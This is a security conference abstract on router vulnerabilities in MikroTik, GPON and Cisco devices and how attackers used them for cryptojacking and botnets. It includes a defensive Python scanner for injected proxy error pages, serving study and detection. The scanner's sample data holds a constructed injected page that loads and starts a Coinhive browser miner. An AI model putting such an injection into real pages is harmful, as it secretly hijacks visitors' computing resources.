This paper by Anurag Shandilya (K7 Computing) was presented at VB2019 in London, UK on 2 October 2019.
Routers are ubiquitous and highly vulnerable to attack. Despite being the central nervous system of any network, routers are disregarded when it comes to security: vulnerabilities in routers are identified and reported, yet most devices remain unpatched, leaving cybercriminals easy targets. In recent years we have seen threat actors shift their focus from complex operating system and network-based attacks to comparatively simple router-based ones.
Beyond merely brute-forcing credentials, cyber gangs have been exploiting known and zero-day router vulnerabilities to host malicious code. CVE-2018-14847, reported in April 2018, is a directory traversal vulnerability in the WinBox service (TCP port 8291) of MikroTik RouterOS v6.29 to v6.42 which "allowed arbitrary file read and write"; the arbitrary read is enough to retrieve the device's user database and recover administrator credentials. Although a patch was available almost immediately, from July 2018 onwards attackers exploited this vulnerability to inject Coinhive, a browser-based Monero miner, into the error page served up by the device's web proxy whenever a user accessed an HTTP page. CVE-2018-10561 was reported in DZS (Dasan Zhone Solutions) GPON routers and was then exploited by multiple router malware families such as Satori and Hajime to carry out their botnet operations; Satori used it to "download and execute shell script on device from /tmp directory". More recently, CVE-2019-1652 has been reported, affecting Cisco routers and allowing "command injection in the router's certificate generation module". This vulnerability, in combination with credential brute-forcing, could hand complete control of a router to an adversary. (There is no known malware exploiting this vulnerability at the time of writing this abstract.)
Detailed analyses of these vulnerabilities have demonstrated the startling ease with which routers are being maliciously exploited both from internal networks and from the Internet. Compromised devices are being used as passive web proxies to snoop on traffic, as active web proxies to serve cryptominers (as in the Coinhive case), or as part of a botnet to inflict DDoS attacks. Since specialized security hardware and software such as network intrusion detection and prevention systems (NIDS/NIPS) are typically needed to detect router infections, the majority of small and medium-sized businesses and home users remain vulnerable to such malware.
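One device-side check for the proxy-injection case described above, given here as an added example rather than code from the paper: request a URL that the router's web proxy will refuse, capture the error page it returns, and inspect it for script content. A router's own error page has no business loading third-party JavaScript, so any external script is reported, and inline scripts are reported when they match a known browser-miner pattern. The two pages are constructed samples; the Coinhive loader URL and the `CoinHive.Anonymous(...)` call follow the public Coinhive client usage, the site key is made up, and the miner pattern list is an assumption that should be extended for other miner libraries.

```python
import re
from html.parser import HTMLParser

# Constructed sample: a plain MikroTik-style web-proxy error page with no
# scripts, the kind of page a healthy router returns.
CLEAN_ERROR_PAGE = """<html><head><title>ERROR: Forbidden</title></head>
<body><h1>ERROR: Forbidden</h1>
<p>While trying to retrieve the URL: http://example.com/</p>
<p>The following error was encountered: Access Denied</p>
</body></html>"""

# Constructed sample of an injected page. The loader URL and the
# CoinHive.Anonymous(...) call follow the public Coinhive client usage;
# the site key is invented for this example.
INJECTED_ERROR_PAGE = """<html><head><title>ERROR: Forbidden</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('EXAMPLESITEKEY0000000000000000');
miner.start();
</script>
</head>
<body><h1>ERROR: Forbidden</h1>
<p>While trying to retrieve the URL: http://example.com/</p>
</body></html>"""

# Strings that identify browser-miner code in inline script. "coinhive" and
# "cryptonight" are real library/algorithm names; the list itself is an
# assumption about what to look for and should be extended as needed.
MINER_PATTERNS = [re.compile(p, re.I)
                  for p in (r"coinhive", r"cryptonight", r"\.Anonymous\(")]


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of <script src=...>
        self.inline = []     # bodies of <script>...</script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> contents as raw data; keep non-empty bodies.
        if self._in_script and data.strip():
            self.inline.append(data.strip())


def scan_error_page(html):
    """Return a list of findings for one proxy error page (empty if clean).

    Every external script is reported, because a router error page should
    not load remote JavaScript at all; inline scripts are reported only when
    they match a miner pattern.
    """
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        findings.append(f"external script loaded from {src}")
    for body in collector.inline:
        hits = [p.pattern for p in MINER_PATTERNS if p.search(body)]
        if hits:
            findings.append("inline script matches miner pattern(s): " + ", ".join(hits))
    return findings


def is_injected(html):
    """True if the page shows any sign of injected content."""
    return bool(scan_error_page(html))


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_ERROR_PAGE), ("injected", INJECTED_ERROR_PAGE)):
        print(f"{name}: {scan_error_page(page) or 'no findings'}")
```

In practice the page to feed into `scan_error_page` is obtained by pointing a client at the router's proxy port and requesting a URL the proxy is configured to deny; because the injection lives in the router's error page rather than in any one website, the check is independent of which site the user was visiting.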
This paper and presentation will provide detailed analyses of the exploit mechanics of the CVE-2018-14847, CVE-2018-10561 and CVE-2019-1652 vulnerabilities, along with a live demo of how these are actively being exploited in the wild. We will also discuss the IoCs and behavioural changes on infected devices which assist in detecting malware on routers without recourse to NIDS/NIPS, and will propose solutions for generic detection of attempts to exploit the mentioned vulnerabilities.